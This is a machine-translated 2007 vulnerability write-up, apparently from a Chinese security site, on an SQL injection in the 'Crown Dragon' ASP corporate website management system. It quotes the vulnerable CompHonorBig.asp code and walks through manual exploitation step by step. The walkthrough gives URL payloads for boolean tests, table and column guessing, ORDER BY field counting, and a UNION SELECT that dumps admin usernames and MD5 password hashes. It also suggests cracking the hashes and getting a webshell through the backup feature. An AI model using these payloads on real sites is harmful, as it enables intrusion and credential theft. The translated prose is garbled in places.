Crown Dragon tech multi-style corporate website management system vulnerability analysis-vulnerability warning-the black bar safety net

2007-10-14T00:00:00
ID MYHACK58:62200717250
Type myhack58
Reporter 佚名
Modified 2007-10-14T00:00:00

Description

This article by www. reghacker. cn written, please reproduced indicate it!!!! Thank you -----------------------------------------------------------------------------------------------------------------------

Haven't published what the article, to the people also a lot less. No way, too little time recent work and problems, depressed and depressing. Today go find a blog system, see the“source code”of the asp source code in the Red font of the system, seemingly, is to tickets, so download the look itself does not intend to research, just saw”good finishing site management system“, few days ago wrote an article about it in the vulnerability analysis of the article, I do not know you remember not. Don't remember, you can go and see. Well, I also not much nonsense. Got only trial version, so the background some functions can not use, but does not affect the system of analysis. I think before I write an article on the loopholes of the deep throat website built Station system was published in the hacker line of Defense on the inside of vulnerability too like, of course I don't know whether is copying each other, and just commit the same error probability is not too large? Oh, another words.... and See CompHonorBig. the asp file's Code Section.

! Program code program code

<%dim id id=request. QueryString("id")%> <% set rs=server. CreateObject("adodb. recordset") rs. open "select * from CompHonor where id="&id,conn,1,1 %>

Obviously, no filtering client submits the variable id a value directly into the database query. TypicalSQL injectionvulnerabilities, many also will not say. See manual process. The address bar submit http://127.0.0.1/CompHonorBig. asp? id=1 8%20and%2 0 1=1, and return to the normal page, as shown in Figure 1.

Figure 1

!

Continue to submit http://127.0.0.1/CompHonorBig. asp? id=1 8%20and%2 0 1=2, it returns a blank page, there are play, as shown in Figure 2.

Figure 2

!

The following guess the table, the submit a http://127.0.0.1/CompHonorBig. asp? id=1 8%20and%20exists(select%2 0*%20from%20admin)returns a normal page, indicating the presence of admin table. Table names with, we guess the column, and submit the http://127.0.0.1/CompHonorBig. asp? id=1 8%20and%20exists(select%20username%20from%20admin)return to the normal page, the description of the admin table there is username column, we continue to guess the solution stored in the password column name. We submitted http://127.0.0.1/CompHonorBig. asp? id=1 8%20and%20exists(select%20password%20from%20admin), the return to the normal page, the description in the admin list there is the password column. From the above given code know that the program does not use order statement, so we use the order statement to guess the number of fields, the submit a http://127.0.0.1/CompHonorBig. asp? id=1 8%20order%20by%2 0 5 return to normal, the submitted http://127.0.0.1/CompHonorBig. asp? id=1 8%20order%20by%2 0 6 returns blank page, the description has 5 fields. We continue. Submitted http://127.0.0.1/CompHonorBig. asp? id=1 8%20union%20select%201,2,3,4,5%20from%20admin return a Figure 3 page source code as follows:

! Program code program code

<div align='center'><img src=4 border=0 ></div>

Figure 3

!

Note<img>tag's src attribute, is 4, This is our structure of the statement of the 4. Figure 3 also returns the number 2, so we use a union combined query to give a user name and password. Submitted http://127.0.0.1/CompHonorBig. asp? id=1 8%20union%20select%2 0 1,username,3,password,5%20from%20admin page returns the user name, the password in the source code, as shown in Figure 4.

Figure 4

!

The password is md5 encrypted, if the password is relatively weak, it can be through the online hack site to get the original.

Oh, due to the relatively lazy, not to continue the analysis. There may be other vulnerabilities, the background has a database backup feature, it should be easy to get to the webshell, I also would not operate. The more holes, waiting for everyone to analyze.

Supplementary description: the vulnerability is seemingly with good fine enterprise built Station system vulnerability is exactly the same, in addition, deep-throat built Station system looks like and also a sample of. Don't know what's wrong with it. Copying it??? Unknown.... and